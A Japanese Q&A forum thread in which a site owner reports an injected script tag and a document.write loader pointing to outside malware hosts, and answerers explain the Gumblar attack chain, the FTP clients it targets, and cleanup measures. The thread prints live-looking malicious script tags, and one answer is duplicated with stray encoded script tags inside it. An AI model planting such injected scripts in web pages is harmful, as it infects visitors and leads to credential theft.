「このサイトはコンピュータに損害を与える可能性があります。」と
出てしまい、ホームページのソースを調べてみると
ヘッダタグとボディタグの間に組み込まれている(通常はありえない)
<script src=http://koispot.com/stagingdrupal/indexi.php ></script>
が見つかりました。
上記サイトに実際に行ってみましたが、
//
と表示されるだけですが、ソースは
//<script>
document.write("<script src=http://jumrea.co.kr/rootboard/data/uploaded/egvaa.php><\/script>");
//</script>
となっており、
そのパソコンにあるデータをいろいろと盗むためのものかもしれないな、など
と思っています。(上記URLには行っていない)
こうしたものがどのような仕組みになっているのかを教えてください。
また、対策は、私がとったように、ただ
<script src=http://koispot.com/stagingdrupal/indexi.php ></script>
をサイトから削除するだけでいいのか、を教えてください。
また、もしかしたら、自分のパソコンに入っていた、いろいろなファイルや
パスワードなどが、盗まれているのではないか、と心配しているのですが、
そのあたりも教えてください。
Gumblarに感染したかもしれません。
あらら(^^;)
ガンブラーウィルスに感染してしまった恐れがあります。
ガンブラーウィルスとは?
http://www.nca.gr.jp/2010/netanzen/index.html
私も同様の被害に合いました。
おそらくは質問者さんのHPのindex.htmlやjsファイルに感染してしまったのではないでしょうか?
このウィルスによる影響としては、FTPのIDとパスを盗まれる危険性があります。
駆除方法としては、ソースそのものを消してしまうのが手っ取り早いですが、
また感染する恐れがあります。
WinSCPというプラグインを使うことにより、FTPのIDとパスを暗号化してしまうため盗まれる危険性はなくなります。
WinSCP導入マニュアル
http://www.cc.tsukuba.ac.jp/WinSCP/
もし、検討違いでありましたら申し訳ございませんm(__)m
URL:ダミー
今でも流行っているのかは分かりませんが、
パソコンの中に入っているウィルスが
勝手にhtmlのタグを書き加えてしまうという、というものが大流行してました。
そのままサイトを放置したままだと、見た人にどんどん広がってしまうので
ウイルスの疑いがあるのならば、まずは一度サーバーからホームページを下ろすことをオススメします。
ホームページウイルスチェックで引っかかるようであれば、
まずは自分のパソコン内のウイルスチェックをして
既に感染してしまったサイトについては、
おそらくパソコン自体が感染していれば、<script src=/load/view.php?a=aHR0cDovL2tvaXNwb3TvvZ7jgpLmtojjgZfjgabjgoI8L3A>
また書き換えられてしまうことが考えられますので
ご自身の使用されている、ウィルス対策ソフトのホームページなどで相談することがよいかと思います。
(市販されている大手のソフトなどでしたら、ちゃんと相談にのってもらえます)
できる限りお早めに対処されたほうがいいかと思います。
私も同様の目にあいましたね。
海外のレンタルサーバーを借りてましたが。
なぜかFireFoxではダメでも、IEでは大丈夫ということもありました。
私がとった作戦はずばり、
サーバーごと解約です。
国内のサーバーにすべて移しました。
直そうとか思わない方がいいですよ。
もうサーバー内のファイルに関しては諦めた方がいいと思います。
今でも流行っているのかは分かりませんが、
パソコンの中に入っているウィルスが
勝手にhtmlのタグを書き加えてしまうという、というものが大流行してました。
そのままサイトを放置したままだと、見た人にどんどん広がってしまうので
ウイルスの疑いがあるのならば、まずは一度サーバーからホームページを下ろすことをオススメします。
ホームページウイルスチェックで引っかかるようであれば、
まずは自分のパソコン内のウイルスチェックをして
既に感染してしまったサイトについては、
おそらくパソコン自体が感染していれば、<script src=/load/view.php?a=aHR0cDovL2tvaXNwb++9nuOCkua2iOOBl+OBpuOCgjwvcA>
また書き換えられてしまうことが考えられますので
ご自身の使用されている、ウィルス対策ソフトのホームページなどで相談することがよいかと思います。
(市販されている大手のソフトなどでしたら、ちゃんと相談にのってもらえます)
できる限りお早めに対処されたほうがいいかと思います。今でも流行っているのかは分かりませんが、
パソコンの中に入っているウィルスが
勝手にhtmlのタグを書き加えてしまうという、というものが大流行してました。
そのままサイトを放置したままだと、見た人にどんどん広がってしまうので
ウイルスの疑いがあるのならば、まずは一度サーバーからホームページを下ろすことをオススメします。
ホームページウイルスチェックで引っかかるようであれば、
まずは自分のパソコン内のウイルスチェックをして
既に感染してしまったサイトについては、
おそらくパソコン自体が感染していれば、<script src=/load/view.php?a=aHR0cDovL2tvaXNwb3TvvZ7jgpLmtojjgZfjgabjgoI8L3A>
また書き換えられてしまうことが考えられますので
ご自身の使用されている、ウィルス対策ソフトのホームページなどで相談することがよいかと思います。
(市販されている大手のソフトなどでしたら、ちゃんと相談にのってもらえます)
できる限りお早めに対処されたほうがいいかと思います。
「Web サイトが改ざんされ、意図しない JavaScript を埋め込まれる事象」はとてもガンブラーの挙動によく似ています。
この挙動がガンブラーという前提で、質問にお答えします。
> こうしたものがどのような仕組みになっているのかを教えてください。
卵が先か鶏が先かという問題はありますが、順を追って説明します。
1、Webサイトのhtmlファイル等を書き換え、別途Webサイトに誘導します。
2、そのWebサイトにて、各種ソフトウェアの脆弱性を突いてマルウェアをダウンロードさせ感染させます。
現時点で判明している「脆弱性のある各種ソフトウェア」
・Microsoft Windows
・Adobe Acrobat
・Adobe Flash Player
・Adobe Reader
・Java(JRE)
3、感染したマルウェアが「各種Windows上FTPソフトウェアの登録データ」や「ブラウザのアカウント情報」の窃取やネットワークに流れるパケットをFTPログイン情報を盗聴し、情報収集した結果を外部の情報収集用サーバに送ります。
現時点で判明している「登録データを窃取されるWindows上FTPソフトウェア」
・ALFTP 5.2 beta1
・BulletPloof FTP Client 2009.72.0.64
・EmFTP 2.02.2
・FFFTP 1.96d
・FileZilla 3.3.1
・FlashFXP 3.6
・Frigate 3.36
・FTP Commander 8
・FTP Navigator 7.77
・FTP Now 2.6.93
・FTP Rush 1.1b
・SmartFTP 4.0.1072.0
・Total Commander 7.50a
・UltraFXP 1.07
・WinSCP 4.2.5
現時点で判明している「アカウント情報を窃取されるブラウザ」
・Microsoft Internet Explorer 6
・Opera 10.10
現時点で推察できる窃取やパケット盗聴され、外部サーバに送られる情報=FTPアカウント情報
・「FTPサーバのホスト名」「ログインID」「パスワード」
4、情報収集用サーバに集まったFTPアカウント情報を元にして、正規FTPユーザになりすましFTPサーバにアクセスします。
5、1に戻ります。
このような一連の挙動を指して「ガンブラー」と呼んでいます。
> サイトから削除するだけでいいのか、を教えてください。
削除すれば、現時点での2次感染を防ぐことはできますが、再度別途Webサイトへ誘導するhtmlファイル等を置かれてしまう恐れがあり、根本的解決にはなりませんので、答えとしてはそれでは駄目です。
> また、もしかしたら、自分のパソコンに入っていた、いろいろなファイルやパスワードなどが、盗まれているのではないか、と心配しているのですが、そのあたりも教えてください。
現時点において確認されている窃取や盗聴されている情報は前述の通りFTPアカウント情報になります。
ただし、ガンブラーはウィルスやマルウェアを指すのではなく、一連の挙動を指しておりますので、マルウェアが異なれば窃取や盗聴する情報も変わります。
メールのプロトコルであるPOP3も「メール本文」や「メールサーバ名」、「ログインID」、「パスワード」等を暗号化せずに平文(テキスト)の状態のパケットでネットワーク上を流れていますのでこれもターゲットにされる可能性はあります。
各種Windows上FTPソフトウェアの登録データを窃取できることから、ファイルやレジストリの読み込みが可能なマルウェアも動作しておりますので、実質上アクセスできる全てのファイル、つまり何でも盗むことは可能ですし、もうすでに盗まれている可能性も大だと思っていただいて構いません。
重要な顧客情報等があった場合は、それを元に「その情報を漏洩させる代わりに金銭の要求する」等の動きが今後出てくる可能性があります。
また、ウィルス駆除ソフトではほとんどマルウェアの感染を防ぐことはまずできません。
新しいマルウェアは続々と生まれており、パターン検索型では追いつかないのが現状のようです。
感染し情報を奪い取られた随分後で感染したことが判明し駆除することができる程度です。
ですので、もっと根本的な対策をお勧めします。
詳しい対策を知りたいのでしたら、私の個人的指向が強いサイトで申し訳ありませんが、
http://www.dreamhope.net/soliloquies/accesscheck/
http://www.dreamhope.net/soliloquies/LAMP10.04/
等で考え方や対応策なども掲載しておりますので、(長文で申し訳ありませんが)参考にしてみてください。
最後にkensan929さんがお勧めされている「WinSCP」も「登録データを窃取されるWindows上FTPソフトウェア」に含まれますのでご注意ください。
ありがとうございました。
まだまだ道のりは長いですが、対策をとってみます。
再度の御送信になっています